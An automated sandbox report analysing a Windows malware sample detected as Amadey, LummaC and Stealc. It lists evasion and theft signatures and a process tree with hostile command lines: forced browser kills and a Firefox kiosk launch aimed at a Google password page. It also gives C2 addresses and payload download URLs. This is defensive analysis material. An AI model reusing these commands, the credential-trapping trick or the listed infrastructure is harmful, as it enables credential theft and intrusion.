Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1571920
MD5:d75b31ba6f3bebdb12b9c28a09d444f9
SHA1:80f5231691ec242eb62324bdf2986c50ae9b2ac8
SHA256:e951c2f841b3ca0b3bb4ba865ab40d102a6074a4b6f74c0c10d99f6ea125c2cf
Tags:exeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 1048 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D75B31BA6F3BEBDB12B9C28A09D444F9)
    • skotes.exe (PID: 6392 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: D75B31BA6F3BEBDB12B9C28A09D444F9)
  • skotes.exe (PID: 6036 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: D75B31BA6F3BEBDB12B9C28A09D444F9)
  • skotes.exe (PID: 5156 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: D75B31BA6F3BEBDB12B9C28A09D444F9)
    • d0d9725343.exe (PID: 2528 cmdline: "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe" MD5: 9A2CC9D6C6282E7B2A0FF5649A70B0DF)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • d0d9725343.exe (PID: 4140 cmdline: "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe" MD5: 9A2CC9D6C6282E7B2A0FF5649A70B0DF)
      • d0d9725343.exe (PID: 5564 cmdline: "C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exe" MD5: 9A2CC9D6C6282E7B2A0FF5649A70B0DF)
    • f30149f036.exe (PID: 3132 cmdline: "C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exe" MD5: F7A47830F40CC4B6A06D777FAB2F42F9)
    • 176986cc9c.exe (PID: 5440 cmdline: "C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe" MD5: 2B86AAB9799FDB49D90E8D5C3F773C33)
    • f570600774.exe (PID: 5936 cmdline: "C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe" MD5: 3A76AB70C01DA0F818F89BFE4E904EE3)
    • 3981530833.exe (PID: 1776 cmdline: "C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe" MD5: 3F7BA360C993567431731DD9E8EB6A67)
      • taskkill.exe (PID: 1668 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1268 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1340 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5560 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 1912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 948 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 1920 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • 536e42fc8b.exe (PID: 5092 cmdline: "C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exe" MD5: BB21543A1E27325F9EA87BAB89FACF4B)
  • 176986cc9c.exe (PID: 3504 cmdline: "C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe" MD5: 2B86AAB9799FDB49D90E8D5C3F773C33)
  • firefox.exe (PID: 6368 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 1892 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 4088 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2352 -parentBuildID 20230927232528 -prefsHandle 2288 -prefMapHandle 2284 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {745b1038-6b91-4698-a3f0-64664cce277e} 1892 "\\.\pipe\gecko-crash-server-pipe.1892" 2149b56f910 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 4340 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4360 -parentBuildID 20230927232528 -prefsHandle 4316 -prefMapHandle 4328 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5763664d-1f38-4c19-9998-65a89666960a} 1892 "\\.\pipe\gecko-crash-server-pipe.1892" 214adcdc110 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • f570600774.exe (PID: 2952 cmdline: "C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exe" MD5: 3A76AB70C01DA0F818F89BFE4E904EE3)
  • 3981530833.exe (PID: 7024 cmdline: "C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exe" MD5: 3F7BA360C993567431731DD9E8EB6A67)
    • taskkill.exe (PID: 6864 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
{"C2 url": ["drive-connect.cyou", "se-blurry.biz", "zinc-sneark.biz", "dare-curbys.biz", "formy-spill.biz", "print-vexer.biz", "covery-mover.biz", "impend-differ.biz", "dwell-exclaim.biz"], "Build id": "FATE99--test"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          0000000E.00000002.3180012118.0000000000A81000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
              0000000D.00000003.3197174045.00000000012CD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0000000F.00000003.3245722384.00000000005E1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 30 entries
                  SourceRuleDescriptionAuthorStrings
                  0.2.file.exe.f40000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    2.2.skotes.exe.bd0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      6.2.skotes.exe.bd0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        3.2.skotes.exe.bd0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                          System Summary

                          barindex
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5156, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\176986cc9c.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5156, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\176986cc9c.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:07:52.600943+010020283713Unknown Traffic192.168.2.650079104.21.48.1443TCP
                          2024-12-09T21:09:13.494827+010020283713Unknown Traffic192.168.2.649867172.67.139.78443TCP
                          2024-12-09T21:09:15.473267+010020283713Unknown Traffic192.168.2.649873172.67.139.78443TCP
                          2024-12-09T21:09:17.894518+010020283713Unknown Traffic192.168.2.649879172.67.139.78443TCP
                          2024-12-09T21:09:20.216536+010020283713Unknown Traffic192.168.2.649884172.67.139.78443TCP
                          2024-12-09T21:09:22.780336+010020283713Unknown Traffic192.168.2.649891172.67.139.78443TCP
                          2024-12-09T21:09:25.344458+010020283713Unknown Traffic192.168.2.649899172.67.139.78443TCP
                          2024-12-09T21:09:28.495705+010020283713Unknown Traffic192.168.2.649905172.67.139.78443TCP
                          2024-12-09T21:09:33.154989+010020283713Unknown Traffic192.168.2.649921104.21.48.1443TCP
                          2024-12-09T21:09:34.232365+010020283713Unknown Traffic192.168.2.649924172.67.139.78443TCP
                          2024-12-09T21:09:35.600959+010020283713Unknown Traffic192.168.2.649930104.21.48.1443TCP
                          2024-12-09T21:09:38.000230+010020283713Unknown Traffic192.168.2.649936104.21.48.1443TCP
                          2024-12-09T21:09:41.519430+010020283713Unknown Traffic192.168.2.649943104.21.48.1443TCP
                          2024-12-09T21:09:44.101691+010020283713Unknown Traffic192.168.2.649951104.21.48.1443TCP
                          2024-12-09T21:09:46.774416+010020283713Unknown Traffic192.168.2.649958104.21.48.1443TCP
                          2024-12-09T21:09:47.108404+010020283713Unknown Traffic192.168.2.649960104.21.48.1443TCP
                          2024-12-09T21:09:49.091677+010020283713Unknown Traffic192.168.2.649967104.21.48.1443TCP
                          2024-12-09T21:09:49.585546+010020283713Unknown Traffic192.168.2.649973104.21.48.1443TCP
                          2024-12-09T21:09:51.926628+010020283713Unknown Traffic192.168.2.649979104.21.48.1443TCP
                          2024-12-09T21:09:54.748280+010020283713Unknown Traffic192.168.2.649992104.21.48.1443TCP
                          2024-12-09T21:09:55.294841+010020283713Unknown Traffic192.168.2.649994104.21.48.1443TCP
                          2024-12-09T21:09:59.001138+010020283713Unknown Traffic192.168.2.650013104.21.48.1443TCP
                          2024-12-09T21:10:04.213257+010020283713Unknown Traffic192.168.2.650033104.21.48.1443TCP
                          2024-12-09T21:10:06.715591+010020283713Unknown Traffic192.168.2.650041104.21.48.1443TCP
                          2024-12-09T21:10:09.484980+010020283713Unknown Traffic192.168.2.650050104.21.48.1443TCP
                          2024-12-09T21:10:17.127406+010020283713Unknown Traffic192.168.2.650065104.21.48.1443TCP
                          2024-12-09T21:10:21.138990+010020283713Unknown Traffic192.168.2.650074104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:14.202655+010020546531A Network Trojan was detected192.168.2.649867172.67.139.78443TCP
                          2024-12-09T21:09:16.213022+010020546531A Network Trojan was detected192.168.2.649873172.67.139.78443TCP
                          2024-12-09T21:09:34.141395+010020546531A Network Trojan was detected192.168.2.649921104.21.48.1443TCP
                          2024-12-09T21:09:35.255676+010020546531A Network Trojan was detected192.168.2.649924172.67.139.78443TCP
                          2024-12-09T21:09:36.350431+010020546531A Network Trojan was detected192.168.2.649930104.21.48.1443TCP
                          2024-12-09T21:09:47.803048+010020546531A Network Trojan was detected192.168.2.649958104.21.48.1443TCP
                          2024-12-09T21:09:49.858611+010020546531A Network Trojan was detected192.168.2.649967104.21.48.1443TCP
                          2024-12-09T21:09:55.507292+010020546531A Network Trojan was detected192.168.2.649992104.21.48.1443TCP
                          2024-12-09T21:10:17.895072+010020546531A Network Trojan was detected192.168.2.650065104.21.48.1443TCP
                          2024-12-09T21:10:21.891581+010020546531A Network Trojan was detected192.168.2.650074104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:14.202655+010020498361A Network Trojan was detected192.168.2.649867172.67.139.78443TCP
                          2024-12-09T21:09:34.141395+010020498361A Network Trojan was detected192.168.2.649921104.21.48.1443TCP
                          2024-12-09T21:09:47.803048+010020498361A Network Trojan was detected192.168.2.649958104.21.48.1443TCP
                          2024-12-09T21:10:17.895072+010020498361A Network Trojan was detected192.168.2.650065104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:16.213022+010020498121A Network Trojan was detected192.168.2.649873172.67.139.78443TCP
                          2024-12-09T21:09:36.350431+010020498121A Network Trojan was detected192.168.2.649930104.21.48.1443TCP
                          2024-12-09T21:09:49.858611+010020498121A Network Trojan was detected192.168.2.649967104.21.48.1443TCP
                          2024-12-09T21:10:21.891581+010020498121A Network Trojan was detected192.168.2.650074104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:07:52.600943+010020579221Domain Observed Used for C2 Detected192.168.2.650079104.21.48.1443TCP
                          2024-12-09T21:09:33.154989+010020579221Domain Observed Used for C2 Detected192.168.2.649921104.21.48.1443TCP
                          2024-12-09T21:09:35.600959+010020579221Domain Observed Used for C2 Detected192.168.2.649930104.21.48.1443TCP
                          2024-12-09T21:09:38.000230+010020579221Domain Observed Used for C2 Detected192.168.2.649936104.21.48.1443TCP
                          2024-12-09T21:09:41.519430+010020579221Domain Observed Used for C2 Detected192.168.2.649943104.21.48.1443TCP
                          2024-12-09T21:09:44.101691+010020579221Domain Observed Used for C2 Detected192.168.2.649951104.21.48.1443TCP
                          2024-12-09T21:09:46.774416+010020579221Domain Observed Used for C2 Detected192.168.2.649958104.21.48.1443TCP
                          2024-12-09T21:09:47.108404+010020579221Domain Observed Used for C2 Detected192.168.2.649960104.21.48.1443TCP
                          2024-12-09T21:09:49.091677+010020579221Domain Observed Used for C2 Detected192.168.2.649967104.21.48.1443TCP
                          2024-12-09T21:09:49.585546+010020579221Domain Observed Used for C2 Detected192.168.2.649973104.21.48.1443TCP
                          2024-12-09T21:09:51.926628+010020579221Domain Observed Used for C2 Detected192.168.2.649979104.21.48.1443TCP
                          2024-12-09T21:09:54.748280+010020579221Domain Observed Used for C2 Detected192.168.2.649992104.21.48.1443TCP
                          2024-12-09T21:09:55.294841+010020579221Domain Observed Used for C2 Detected192.168.2.649994104.21.48.1443TCP
                          2024-12-09T21:09:59.001138+010020579221Domain Observed Used for C2 Detected192.168.2.650013104.21.48.1443TCP
                          2024-12-09T21:10:04.213257+010020579221Domain Observed Used for C2 Detected192.168.2.650033104.21.48.1443TCP
                          2024-12-09T21:10:06.715591+010020579221Domain Observed Used for C2 Detected192.168.2.650041104.21.48.1443TCP
                          2024-12-09T21:10:09.484980+010020579221Domain Observed Used for C2 Detected192.168.2.650050104.21.48.1443TCP
                          2024-12-09T21:10:17.127406+010020579221Domain Observed Used for C2 Detected192.168.2.650065104.21.48.1443TCP
                          2024-12-09T21:10:21.138990+010020579221Domain Observed Used for C2 Detected192.168.2.650074104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:56.981463+010020197142Potentially Bad Traffic192.168.2.650000185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:15.077061+010020446961A Network Trojan was detected192.168.2.649868185.215.113.4380TCP
                          2024-12-09T21:09:23.795328+010020446961A Network Trojan was detected192.168.2.649892185.215.113.4380TCP
                          2024-12-09T21:09:32.579782+010020446961A Network Trojan was detected192.168.2.649916185.215.113.4380TCP
                          2024-12-09T21:09:40.974986+010020446961A Network Trojan was detected192.168.2.649942185.215.113.4380TCP
                          2024-12-09T21:09:48.316285+010020446961A Network Trojan was detected192.168.2.649965185.215.113.4380TCP
                          2024-12-09T21:09:58.614446+010020446961A Network Trojan was detected192.168.2.650008185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:31.671259+010020579211Domain Observed Used for C2 Detected192.168.2.6559411.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:18.817215+010020480941Malware Command and Control Activity Detected192.168.2.649879172.67.139.78443TCP
                          2024-12-09T21:09:38.982442+010020480941Malware Command and Control Activity Detected192.168.2.649936104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:42.584237+010020442431Malware Command and Control Activity Detected192.168.2.649944185.215.113.20680TCP
                          2024-12-09T21:09:58.302568+010020442431Malware Command and Control Activity Detected192.168.2.650004185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:05.209521+010028561471A Network Trojan was detected192.168.2.649848185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:13.726517+010028561221A Network Trojan was detected185.215.113.4380192.168.2.649854TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T21:09:09.655624+010028033053Unknown Traffic192.168.2.64985931.41.244.1180TCP
                          2024-12-09T21:09:16.795296+010028033053Unknown Traffic192.168.2.64987431.41.244.1180TCP
                          2024-12-09T21:09:25.260013+010028033053Unknown Traffic192.168.2.649898185.215.113.1680TCP
                          2024-12-09T21:09:34.035710+010028033053Unknown Traffic192.168.2.649923185.215.113.1680TCP
                          2024-12-09T21:09:42.435053+010028033053Unknown Traffic192.168.2.649945185.215.113.1680TCP
                          2024-12-09T21:09:49.776192+010028033053Unknown Traffic192.168.2.649969185.215.113.1680TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: file.exeAvira: detected
                          Source: https://atten-supporse.biz/6)Avira URL Cloud: Label: malware
                          Source: http://185.215.113.16/well/random.exe_QAvira URL Cloud: Label: malware
                          Source: http://185.215.113.43/Zu7JuNko/index.phpncodedM=Avira URL Cloud: Label: malware
                          Source: http://185.215.113.16/steam/random.exeZPAvira URL Cloud: Label: malware
                          Source: https://atten-supporse.biz/apiU.Avira URL Cloud: Label: malware
                          Source: http://185.215.113.206/c4becf79229cb002.phpgRLAvira URL Cloud: Label: malware
                          Source: http://185.215.113.206/c4becf79229cb002.phpphAvira URL Cloud: Label: malware
                          Source: http://185.215.113.16/luma/random.exe;PAvira URL Cloud: Label: malware
                          Source: http://185.215.113.16/luma/random.exe-PAvira URL Cloud: Label: malware
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: HEUR/AGEN.1320706
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: 00000000.00000002.2160499744.0000000000F41000.00000040.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: 0000000E.00000002.3190013417.000000000145E000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
                          Source: 11.2.d0d9725343.exe.400000.1.unpackMalware Configuration Extractor: LummaC {"C2 url": ["drive-connect.cyou", "se-blurry.biz", "zinc-sneark.biz", "dare-curbys.biz", "formy-spill.biz", "print-vexer.biz", "covery-mover.biz", "impend-differ.biz", "dwell-exclaim.biz"], "Build id": "FATE99--test"}
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeReversingLabs: Detection: 31%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeReversingLabs: Detection: 54%
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeReversingLabs: Detection: 31%
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeReversingLabs: Detection: 54%
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 55%
                          Source: file.exeReversingLabs: Detection: 55%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                          Source: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                          Source: file.exeJoe Sandbox ML: detected
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: impend-differ.biz
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: print-vexer.biz
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: dare-curbys.biz
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: covery-mover.biz
                          Source: 11.2.d0d9725343.exe.400000.1.unpackString decryptor: formy-spill.biz
